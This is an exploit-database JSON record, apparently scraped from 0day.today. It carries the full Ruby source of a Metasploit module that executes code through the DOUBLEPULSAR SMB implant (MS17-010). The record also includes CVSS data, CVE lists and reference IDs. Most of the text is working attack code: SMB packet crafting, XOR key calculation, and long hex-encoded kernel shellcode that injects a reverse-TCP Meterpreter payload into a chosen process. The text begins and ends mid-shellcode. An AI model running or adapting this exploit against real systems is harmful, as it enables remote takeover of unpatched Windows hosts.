\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:13:26", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f737698caa6a8139ed19b120d65c0684", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-11T22:17:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:17:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:17:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n 